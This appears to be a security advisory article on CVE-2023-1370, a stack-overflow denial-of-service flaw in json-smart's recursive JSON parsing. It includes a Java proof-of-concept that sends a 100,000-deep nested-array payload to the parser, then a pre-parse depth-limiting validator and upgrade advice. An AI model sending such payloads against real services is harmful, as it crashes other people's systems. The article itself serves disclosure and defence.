json-smart is a high-performance, lightweight JSON processor library for Java. It is designed to process JSON data efficiently, with a focus on speed. It comes with a set of handy features such as simple parsing and serialization, a JSONPath implementation, and support for various encoding types.

Unfortunately, a vulnerability (CVE-2023-1370) has been discovered in json-smart that allows an attacker to exhaust the parser's call stack. In Java this surfaces as a java.lang.StackOverflowError that terminates the thread parsing the input, so the practical effect is a denial of service rather than memory corruption. The root cause is the library's handling of nested arrays and objects in a JSON input.

In this article, we will discuss the details of the CVE-2023-1370 vulnerability, what it means for developers and users of json-smart, and recommended mitigation steps.

Vulnerability Details

The vulnerability lies in the parsing of JSON arrays and objects. When json-smart encounters a [ or { character in the input, it calls the array or object reader, which in turn calls the value reader for each element, so every level of nesting adds another set of stack frames. Nothing counts or caps that nesting, so an input with enough nested layers drives the recursion until the thread's stack is exhausted. The payload needed is tiny: each additional level costs the attacker two bytes ([ and ]) but costs the parser a full set of frames.

The simplified snippet below illustrates the problem. It is modelled on the array-reading loop in net.minidev.json.parser.JSONParserBase and is not verbatim library source; the point is the shape of the recursion, not the exact statements.

// Simplified illustration of the recursive structure (not verbatim json-smart code).
// readValue() dispatches to readArray() on '[' and readObject() on '{', and each
// of those calls readValue() again for every element, so the nesting depth of
// the input equals the recursion depth of the parser.
private void readArray(JsonParserBase p, JsonSmartFactory factory) throws IOException {
   ...
   while (true) {
      ch = p.nextCleanInline();
      if (ch == -1)          // end of input
         break;
      if (ch == ',')
         continue;
      if (ch == ']')
         break;
      p.back();
      this.add(p.readValue(factory));   // recurses; no depth counter, no limit
   }
}

As the snippet shows, reading an array hands every element back to the value reader, which recurses into nested arrays without any limit on the depth of nesting. The object reader has the same structure, so { nested to the same depth is equally effective, and the two can be mixed freely.

Exploit Scenario

An attacker who controls any JSON that the application parses (a request body, a webhook payload, a message from a queue) supplies a document consisting of tens of thousands of opening brackets or braces, optionally followed by the matching closers. The parser recurses once per level until the thread's stack is exhausted and a StackOverflowError is thrown. The depth at which this happens depends on the JVM's thread stack size (-Xss, or the size passed when the thread was created) and on how many frames each level costs, not on the payload alone, so a size that is harmless on one deployment can crash another. Because StackOverflowError is an Error rather than an Exception, typical exception handling does not catch it; the request thread dies, and in a server where threads are pooled and reused the result is a denial of service that the attacker can repeat at will. Catching the Error is not a fix, since the stack has already been consumed and the application's state at that point is undefined.
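The following is an added example that is not part of the original article or of the json-smart project. It builds the nested-array payload described above (a constructed input, not a captured one), feeds it to json-smart's real entry point net.minidev.json.JSONValue.parseWithException, and reports whether the parser returned, rejected the input, or threw StackOverflowError. The class name, the chosen depths and the 256 KiB stack size are assumptions for the demonstration; it needs net.minidev:json-smart on the classpath, and the crash only reproduces on a version before the fix.

```java
import net.minidev.json.JSONValue;
import net.minidev.json.parser.ParseException;

/**
 * Added example (not json-smart code): observes what json-smart does with a
 * deeply nested array. Assumes net.minidev:json-smart is on the classpath.
 */
public class NestingCrashDemo {

    /** Constructed payload: depth opening brackets followed by depth closing ones. */
    static String nestedArrays(int depth) {
        StringBuilder sb = new StringBuilder(depth * 2);
        for (int i = 0; i < depth; i++) sb.append('[');
        for (int i = 0; i < depth; i++) sb.append(']');
        return sb.toString();
    }

    /** Returns a short description of the parser's behaviour on the input. */
    static String tryParse(String json) {
        try {
            JSONValue.parseWithException(json);
            return "parsed";
        } catch (ParseException e) {
            // A patched json-smart rejects over-deep input here instead of recursing.
            return "rejected: " + e.getMessage();
        } catch (StackOverflowError e) {
            // The CVE-2023-1370 outcome: recursion exhausted the thread stack.
            return "StackOverflowError";
        }
    }

    public static void main(String[] args) throws InterruptedException {
        // Small depths parse fine; a depth of tens of thousands exhausts a
        // default-sized thread stack on an unpatched json-smart.
        for (int depth : new int[] {10, 1_000, 100_000}) {
            System.out.println("depth " + depth + ": " + tryParse(nestedArrays(depth)));
        }
        // Same payload on a thread with a smaller stack (the size is a hint to the
        // JVM): shows that the crash threshold depends on the deployment, not only
        // on the payload.
        Thread small = new Thread(null,
                () -> System.out.println("256 KiB stack, depth 100000: "
                        + tryParse(nestedArrays(100_000))),
                "small-stack", 256 * 1024);
        small.start();
        small.join();
    }
}
```

Run it once against the affected version and once against a patched one: the first prints StackOverflowError for the large depth, the second prints a ParseException rejection. The second thread makes the point that a "safe" depth measured on a developer laptop with a 1 MiB default stack says nothing about a container started with a smaller -Xss.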

Original References

1. Json-smart library: https://netplex.github.io/json-smart/
2. CVE details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1370

Mitigation Steps

The fix is to bound the nesting depth before the recursive parser can consume the stack. In order of preference:

1. Upgrade json-smart to 2.4.9 or later, which adds a nesting-depth limit to the parser so that over-deep input is rejected instead of recursed into.

2. If you cannot upgrade immediately, validate untrusted input before parsing: cap the size of the document, then scan it once, counting [ and { outside string literals, and reject it when the count exceeds a limit that your legitimate documents never approach. This is a single linear pass with no recursion, so the check itself cannot be overflowed, and it costs far less than the parse it protects.

3. Switching to another JSON library only helps if the replacement actually enforces a limit. Jackson's StreamReadConstraints (2.15 and later) caps nesting depth; earlier Jackson releases recurse without a cap in the same way json-smart does. Verify the behaviour of the exact version you would adopt, for Gson as well, rather than assuming a limit exists.
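The following is an added example of the pre-parse check from step 2; it is not code from the article or from json-smart. The depth scan walks the raw text once with constant stack usage, skips over string literals so that brackets inside strings (or inside keys) are not miscounted, honours backslash escapes, and stops early as soon as the limit is exceeded. The class name, the MAX_DEPTH and MAX_CHARS values, the IllegalArgumentException used for rejection and the sample inputs are all assumptions for the demonstration; the only json-smart API used is JSONValue.parseWithException. It requires Java 11 or later for String.repeat.

```java
import net.minidev.json.JSONValue;
import net.minidev.json.parser.ParseException;

/**
 * Added example (not json-smart code): bounds the size and nesting depth of
 * untrusted JSON text before it reaches the recursive parser. Limits are assumed.
 */
public final class BoundedJsonParser {
    static final int MAX_DEPTH = 64;        // assumed: deeper than any legitimate document here
    static final int MAX_CHARS = 1 << 20;   // assumed: 1 MiB cap on the raw input

    /**
     * Returns the maximum nesting depth of the text, counting '[' and '{' only
     * outside string literals, or -1 as soon as the depth exceeds limit, so a
     * hostile input is rejected without scanning the rest of it. Mismatched
     * closers are left for the real parser to report.
     */
    static int nestingDepth(String json, int limit) {
        int depth = 0, max = 0;
        boolean inString = false;
        for (int i = 0; i < json.length(); i++) {
            char c = json.charAt(i);
            if (inString) {
                if (c == '\\') i++;                 // skip the escaped character
                else if (c == '"') inString = false;
                continue;
            }
            switch (c) {
                case '"': inString = true; break;
                case '[': case '{':
                    if (++depth > limit) return -1;
                    if (depth > max) max = depth;
                    break;
                case ']': case '}':
                    if (depth > 0) depth--;
                    break;
                default: break;
            }
        }
        return max;
    }

    /** Parses untrusted JSON, refusing input that is too large or too deeply nested. */
    static Object parseUntrusted(String json) throws ParseException {
        if (json.length() > MAX_CHARS) {
            throw new IllegalArgumentException("input too large: " + json.length() + " chars");
        }
        if (nestingDepth(json, MAX_DEPTH) < 0) {
            throw new IllegalArgumentException("nesting deeper than " + MAX_DEPTH);
        }
        return JSONValue.parseWithException(json);
    }

    public static void main(String[] args) throws ParseException {
        // Constructed inputs: the closers inside the string value must not be counted.
        String ok = "{\"a\":[1,{\"b\":\"]]]]]]]]\"}]}";
        System.out.println("depth(ok) = " + nestingDepth(ok, MAX_DEPTH));   // 3
        System.out.println("parsed: " + parseUntrusted(ok));

        String hostile = "[".repeat(100_000) + "]".repeat(100_000);
        try {
            parseUntrusted(hostile);
        } catch (IllegalArgumentException e) {
            System.out.println("rejected before parsing: " + e.getMessage());
        }
    }
}
```

The size cap is there because a depth limit alone does not bound resource use: a flat array of millions of small elements never exceeds depth 1 but still costs heap and CPU. Keep the depth limit as low as your real documents allow; 64 is generous for most APIs, and the parser's recursion at that depth is far from any realistic stack size.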

Conclusion

CVE-2023-1370 is a straightforward but effective denial-of-service flaw: a few hundred kilobytes of brackets are enough to kill any thread that hands untrusted input to an unpatched json-smart parser. Upgrade to a version with a nesting limit, and where untrusted JSON crosses a trust boundary, cap its size and depth before parsing regardless of which library sits behind the boundary. Treating input nesting depth as a resource to be budgeted, like request size or timeout, is what prevents this class of bug from recurring.

Timeline

Published on: 03/22/2023 06:15:00 UTC
Last modified on: 03/29/2023 19:02:00 UTC